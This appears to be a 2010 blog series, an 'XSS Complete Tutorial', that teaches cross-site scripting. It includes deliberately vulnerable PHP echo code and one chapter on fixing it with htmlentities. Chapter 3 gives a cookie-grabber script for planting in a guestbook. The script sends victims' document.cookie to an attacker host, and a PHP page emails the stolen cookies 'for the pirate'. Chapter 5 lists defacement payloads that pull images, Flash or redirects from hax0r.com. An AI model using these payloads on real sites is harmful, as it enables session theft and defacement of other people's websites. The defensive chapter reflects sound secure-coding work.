Showing posts with label Xss Complete Tutorial. Show all posts
Showing posts with label Xss Complete Tutorial. Show all posts

Tuesday, November 23, 2010

======Chapter 1 - What is XSS ?========

Xss Complete Tutorial ,
======Chapter 1 - What is XSS ?========
Cross-zone scripting is a browser exploit taking
advantage of a vulnerability within a zone-based security solution.
The attack allows content (scripts) in unprivileged zones
to be executed with the permissions of a privileged zone - i.e.
a privilege escalation within the client (web browser) executing the script.
The vulnerability could be:

* a web browser bug which under some conditions allows content (scripts)
in one zone to be executed with the permissions of a higher privileged zone.

* a web browser configuration error; unsafe sites listed in privileged zones.

* a cross-site scripting vulnerability within a privileged zone

A common attack scenario involves two steps.
The first step is to use a Cross Zone Scripting vulnerability
to get scripts executed within a privileged zone. To complete the attack,
then perform malicious actions on the computer using insecure ActiveX components.

This type of vulnerability has been exploited to silently install
various malware (such as spyware, remote control software, worms and such)
onto computers browsing a malicious web page.
Read more »
at 1 comment:
Labels:

==========Chapter 2 - Code a XSS vulnerability==========

Xss Complete Tutorial ,
==========Chapter 2 - Code a XSS vulnerability==========

Open notepad and copy/past this script:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style><title>Simple XSS vulnerability by Xylitol</title>
<body>
<form action="XSS.php" method="post">
<p align="center"><strong>Simple XSS vulnerability by Xylitol </strong></p>
<div align="center">
<table width="270" border="0">
<tr>
<td width="106"><strong>Search:</strong></td>
<td width="154"><input name="Vulnerability" type="text" id="Vulnerability" /></td>
</tr>
</table>
<table width="268" border="0">
<tr>
<td width="262"><div align="center">
<input name="submit" type="submit" value=" Search it ! " />
</div></td>
</tr>
</table>
</div>
</form>
</body>
</html>




after, save this page: index.html
open a new notpad and Copy/past that:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Search result:</title>
<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style></head>
<body>
<span class="alerte">Search result :</span>&nbsp;<strong><?php echo $_POST['Vulnerability']; ?></strong>&nbsp;
</body>
</html>

save this page in: XSS.php
close notepad

open index.html in firefox
enter a value and search
return on the page of research and enter <script>alert('XSS')</script>
send the form
bingo a dialogue box !

_______________________________________
http://127.0.0.1 dit: X \
|________________________________________|
| |
| |
| ^ |
| / \ |
| / | \ XSS |
| / . \ |
| ------- |
| ______ |
| | OK | |
| ------ |
|________________________________________|
XSS Vulnerability is here...
Read more »
at No comments:
Labels:

========Chapter 3 - Make a cookie grabbers=======

Xss Complete Tutorial ,
========Chapter 3 - Make a cookie grabbers=======
insert this script in a vulnerable page (for exemple a guestbook)

<script>
window.open("http://www.Hax0r.com/cookie.php?cookies="+document.cookie);
</script>


(www.Hax0r.com = your site)
Open notepad and make a page: cookie.php
copy/past this code:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Error</title>
<style type="text/css">
<!--
body,td,th {
color: #FFFFFF;
}
body {
background-color: #000000;
}
-->
</style></head>
<? mail('email@example.com', 'Cookie stealed ! - thx xyli :)', $cookies); ?> 
<body>
<h2><strong>Error</strong> - <strong>Access denied</strong> for <? echo $_SERVER["REMOTE_ADDR"]; ?></h2>
</body>
</html>


It is not enough any more but for the pirate,
than to await the reception of the email and to read the cookie there.
Read more »
at No comments:
Labels:

======Chapter 4 - Securing XSS======

Xss Complete Tutorial ,
======Chapter 4 - Securing XSS======
FIX it:
for fix XSS Vulnerability use htmlentities:


in line 16 Remplace:
<body>
<span class="alerte">Search result :</span>&nbsp;<strong><?php echo $_POST['Vulnerability']; ?></strong>&nbsp;
</body>

By:

<body>
<span class="alerte">Search result :</span>&nbsp;<strong><?php
if(isset($_POST['Vulnerability'])) { echo htmlentities($_POST['Vulnerability']); } ?></strong>&nbsp;
</body>


use htmlspecialchars() function in PHP ;)

other function:
htmlentities() quotes
strip_tags()
...
Read more »
at No comments:
Labels:

========Chapter 5 -deface Methods========

Xss Complete Tutorial ,
========Chapter 5 -deface Methods========
defacer with a XSS and a rather simple thing
here are the principal ones…

defacement by an image:
<IMG SRC="http://hax0r.com/Haxored.png">

or a video flash:
<EMBED SRC="http://hax0r.com/Haxored.swf"


more knew: the redirection:
<script>window.open( "http://www.hax0r.com/Haxored.html" )</script>

also see:
<meta http-equiv="refresh" content="0; url=http://hax0r.com/Haxored.html" />
Read more »
at No comments:
Labels: